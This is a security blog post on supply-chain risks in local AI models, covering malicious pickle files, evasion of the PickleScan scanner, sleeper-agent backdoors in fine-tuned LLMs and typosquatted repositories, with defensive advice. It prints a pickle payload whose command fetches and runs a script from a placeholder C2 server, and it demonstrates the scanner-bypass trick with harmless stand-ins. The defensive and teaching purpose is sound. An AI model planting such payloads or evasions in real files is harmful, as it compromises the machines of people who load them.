TL;DR: Local models solve privacy. They do not solve security. Pickle files execute arbitrary code on load, fine-tuned models hide sleeper agents that generate insecure code based on your political context, and typosquatted repos on Hugging Face look almost identical to the real thing. SafeTensors and verified providers kill roughly 90% of the risk.


Why “Local” Doesn’t Mean “Safe”



Most people run local AI for one reason: privacy. No more sending every prompt to a SaaS provider’s servers, no more wondering if “do not train on my data” actually means they stop collecting your data. Fair enough.

But here’s where people get tripped up. Privacy and security are two different problems. Privacy is about your information going out. Security is about someone else’s code coming in. A local model keeps your data off OpenAI’s servers, sure. It also means you just downloaded a file from the internet and trusted the person behind it not to add anything extra.

That file is someone else’s code running on your machine. Think about that for a second. We wouldn’t grab a random .exe off a forum and double-click it. But somehow, downloading a 40GB model file from a community repo feels different. It shouldn’t.

Protect AI identified over 352,000 suspicious files across 51,700 models on Hugging Face. Over 80% of the models in the ecosystem used pickle serialization, which is vulnerable to arbitrary code execution. So yeah, we’ve got a supply chain problem.

How Pickle Files Hand Over Your Machine



Here’s the actual attack chain. Most AI models get packaged using Python’s pickle format, a serialization method that turns the model’s weights and metadata into a byte stream for download. PyTorch’s torch.save uses it by default. A pickle file is not just data: it is a small program for pickle’s stack-based virtual machine, and its opcodes can import and call any Python function while the file gets deserialized. Think of deserialization as the moment your computer unpacks the model and loads it into memory. Normal model files should just contain numbers. A pickle file can contain anything.

```python
# What a malicious pickle payload looks like (simplified)
import os

class Payload:
    def __reduce__(self):
        return (os.system, ('curl http://[C2_SERVER]/beacon | sh',))
```

Python calls the __reduce__ method when the object is pickled, and the callable it returns fires automatically when the file is unpickled. No user interaction. No confirmation dialog. You load the model, the payload runs. Rapid7 documented weaponized .pth files on Hugging Face deploying Go-based remote access trojans through Cloudflare Tunnels, which hid the C2 server behind legitimate infrastructure. JFrog found three zero-day bypasses in PickleScan, the industry-standard tool Hugging Face uses to scan uploads. The malicious models passed every check.
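To see the mechanism without running anything dangerous, here is a minimal sketch that swaps the shell command for a harmless `eval("6 * 7")`. The choice of `eval` and the expression are assumptions for illustration; any importable callable would behave the same way.

```python
import pickle

class Payload:
    def __reduce__(self):
        # Runs at pickling time. It tells pickle: "to rebuild me, call eval('6 * 7')".
        return (eval, ("6 * 7",))

blob = pickle.dumps(Payload())   # attacker side: build the "model file"
loaded = pickle.loads(blob)      # victim side: just loading it

# The Payload object never comes back; the result of the call does.
print(type(loaded).__name__, loaded)
```

Nothing in the loading code asked for `eval` to run. The instruction to call it travelled inside the file.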

The scanner validates the file structure first, then scans for dangerous functions. Attackers break the file structure after the payload, so the scanner errors out before reaching the dangerous code. Deserialization doesn’t care about file validity. It just executes opcodes as it reads them. This is the same class of supply chain attack we see in vibe coding, just through a different door.
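The gap between "scanner" and "loader" can be reproduced with the standard library alone. This is a rough sketch, not how PickleScan is actually implemented: `naive_scan` is a hypothetical scanner that parses the whole stream before judging it, and the payload is a harmless stand-in that only creates an empty directory in a temp folder.

```python
import os
import pickle
import pickletools
import tempfile

SUSPICIOUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins"}

def naive_scan(blob):
    """Hypothetical scanner: parse the whole stream first, then flag risky imports."""
    ops = list(pickletools.genops(blob))  # raises ValueError on a malformed stream
    names = [arg for _, arg, _ in ops if isinstance(arg, str)]
    return [n for n in names if n.split(" ")[0] in SUSPICIOUS_MODULES]

marker = os.path.join(tempfile.mkdtemp(), "payload_ran")

class Payload:
    def __reduce__(self):
        # Harmless stand-in for a real payload: create an empty directory.
        return (os.mkdir, (marker,))

clean_stream = pickle.dumps(Payload())
broken_stream = clean_stream[:-1] + b"\xff"  # swap the final STOP for an invalid opcode

print(naive_scan(clean_stream))              # the intact stream gets flagged

try:
    naive_scan(broken_stream)
    scanner_verdict = "scanned"
except ValueError:
    scanner_verdict = "scanner crashed, no verdict"

try:
    pickle.loads(broken_stream)
except Exception:
    pass  # the load fails, but only after the payload opcode already ran

print(scanner_verdict, "| payload ran:", os.path.isdir(marker))
```

The corrupt byte sits after the call opcode, so the loader reaches the payload before it reaches the error. A scanner that treats "could not parse" as "nothing found" lets the file through.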

Sleeper Agents Hide in the Weights





The pickle file problem is the loud attack. The quiet one is worse. Anyone can fine-tune an open-weight model, merge multiple models together, and release the result on Hugging Face. That fine-tuning process can embed behavior that’s invisible during normal use and only activates under specific conditions. We call these sleeper agents. CrowdStrike documented that DeepSeek-R1 is up to 50% more likely to generate code with severe vulnerabilities when the prompt contains topics the CCP considers politically sensitive, things like references to Tibet, Uyghur communities, or Falun Gong.

The model writes clean, secure APIs for CCP-aligned projects. Drop a geopolitical trigger into the prompt context, and suddenly authentication is broken, API keys are hardcoded, and backdoors appear in the generated output. CrowdStrike even found what looks like an intrinsic kill switch: in 45% of Falun Gong-related prompts, the model refused to generate code entirely despite building full implementation plans internally.

You’d never catch this during casual testing. The model passes benchmarks. It answers questions correctly. It codes competently, right up until the trigger condition fires. And because these behaviors are distributed across billions of floating-point parameters, there’s no file you can grep. No config to audit. The sleeper is the weights. This same hardcoded secrets pattern shows up across AI-generated code, but with sleeper agents, it’s intentional.

How to Download Local Models Without Getting Owned

Not trying to scare anyone off local models. They’re useful, they’re getting better fast, and the privacy upside is real. But do these two things and you’ve killed roughly 90% of the attack surface.

Get your model from a verified provider. On Hugging Face, look for the check mark next to the publisher name. Google publishes Gemma. Meta publishes Llama. Download from them directly, not from totally-legit-llama-quantized-v2 posted by a random account. Watch the name carefully. Typosquatting is real: attackers swap a lowercase L for a 1, or transpose two letters. One character is the difference between a clean model and a compromised supply chain.
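A name check like this is easy to automate before any download happens. The sketch below is one possible approach, assuming you keep your own allowlist of repo IDs you have verified by hand; the two entries, the look-alike character map, and the 0.9 threshold are all illustrative choices, not a standard.

```python
from difflib import SequenceMatcher

# Example allowlist; maintain your own from publishers you have verified.
TRUSTED_REPOS = [
    "meta-llama/Llama-3.1-8B-Instruct",
    "google/gemma-2-9b-it",
]

# Characters attackers commonly swap for look-alikes (illustrative, not complete).
CONFUSABLES = str.maketrans({"1": "l", "0": "o"})

def normalize(repo_id):
    return repo_id.lower().translate(CONFUSABLES)

def classify(repo_id, threshold=0.9):
    """Return 'trusted', 'lookalike', or 'unknown' for a repo id."""
    if repo_id in TRUSTED_REPOS:
        return "trusted"
    candidate = normalize(repo_id)
    for trusted in TRUSTED_REPOS:
        similarity = SequenceMatcher(None, candidate, normalize(trusted)).ratio()
        if similarity >= threshold:
            return "lookalike"
    return "unknown"

for repo in ["meta-llama/Llama-3.1-8B-Instruct",
             "meta-1lama/Llama-3.1-8B-Instruct",
             "meta-llama/Llama-3.1-8B-Instrcut",
             "someone/tiny-test-model"]:
    print(repo, "->", classify(repo))
```

The exact ID comes back as trusted, the swapped-character and transposed-letter variants come back as lookalike, and the unrelated repo comes back as unknown. A lookalike result is the one worth stopping for: it means the name is close to something you trust without being it.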

Only download .safetensors files. SafeTensors is a file format specifically designed to strip code execution out of the equation. The file can only contain raw tensor data and metadata. No opcodes. No __reduce__. No surprises. If the model only ships as .bin, .pt, .pth, or .pkl, find a different model. Hugging Face is pushing the ecosystem toward SafeTensors for exactly this reason.
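The format is simple enough to inspect by hand: an 8-byte little-endian length, a JSON header describing each tensor, then raw bytes. The sketch below reads only that header using the standard library. The function name, the demo file, and the size cap are assumptions made for this example; for actually loading weights, use the official safetensors library.

```python
import json
import os
import struct
import tempfile

MAX_HEADER_BYTES = 100 * 1024 * 1024  # sanity cap chosen for this sketch

def read_safetensors_header(path):
    """Return the JSON header of a .safetensors file without touching tensor data."""
    with open(path, "rb") as f:
        (header_len,) = struct.unpack("<Q", f.read(8))  # little-endian unsigned 64-bit
        if header_len > MAX_HEADER_BYTES:
            raise ValueError("header length is implausibly large")
        return json.loads(f.read(header_len).decode("utf-8"))

# Build a tiny file by hand to show there is nothing in it but JSON and raw bytes.
header = {"weight": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}
header_bytes = json.dumps(header).encode("utf-8")
demo_path = os.path.join(tempfile.mkdtemp(), "demo.safetensors")
with open(demo_path, "wb") as f:
    f.write(struct.pack("<Q", len(header_bytes)))
    f.write(header_bytes)
    f.write(struct.pack("<2f", 1.0, 2.0))  # 8 bytes of float32 data

for name, info in read_safetensors_header(demo_path).items():
    if name == "__metadata__":
        continue  # optional free-form string metadata, not a tensor
    print(name, info["dtype"], info["shape"])
```

There is no step in this parser where the file gets to name a function to call. That is the whole point of the format.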

One bonus step: verify the hash. Providers publish a cryptographic hash (usually SHA-256) of each model file. Download the model, run the same hashing algorithm, compare the strings. If they match, the file on your disk is byte-for-byte what the provider published and nobody tampered with it in transit. If they don’t, burn it.
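In practice the comparison is a few lines of standard-library Python. This sketch assumes the provider publishes a SHA-256 hex digest; the function names are made up for the example, and the file is read in chunks so a 40GB model does not need to fit in memory.

```python
import hashlib
import hmac

def sha256_of_file(path, chunk_size=1024 * 1024):
    """Hash a file in 1 MiB chunks and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def matches_published_hash(path, published_hex):
    """True only if the local file hashes to the published value."""
    return hmac.compare_digest(sha256_of_file(path), published_hex.strip().lower())
```

Call `matches_published_hash("model.safetensors", "<digest copied from the provider's page>")` and refuse to load the file if it returns False. Copy the published digest from the provider's official listing, not from the same mirror you downloaded the file from.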


Frequently Asked Questions

Is Hugging Face safe for downloading AI models?

Hugging Face is a hosting platform, like GitHub. Anyone can upload to it. The risk comes from unverified uploads. Stick to verified providers with the check mark badge, download only SafeTensors format files, and verify the hash against the official listing. Those three steps eliminate the vast majority of threats.

What is a pickle file attack in AI?

Python’s pickle format can embed instructions that import and call arbitrary Python functions inside serialized data. When a model packaged as a pickle file gets loaded, those calls execute automatically with no user prompt. Attackers use this to deploy remote access trojans, exfiltrate data, and establish persistent backdoors on the machine that loaded the model.

Can a local AI model be backdoored?

Yes. Fine-tuning allows anyone to modify a model’s behavior at the weight level. Sleeper agents are models that pass normal testing but activate malicious behavior under specific trigger conditions, like detecting politically sensitive context in a prompt. Because the behavior lives in the model’s parameters, not in external code, traditional security scanning cannot detect it.

ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.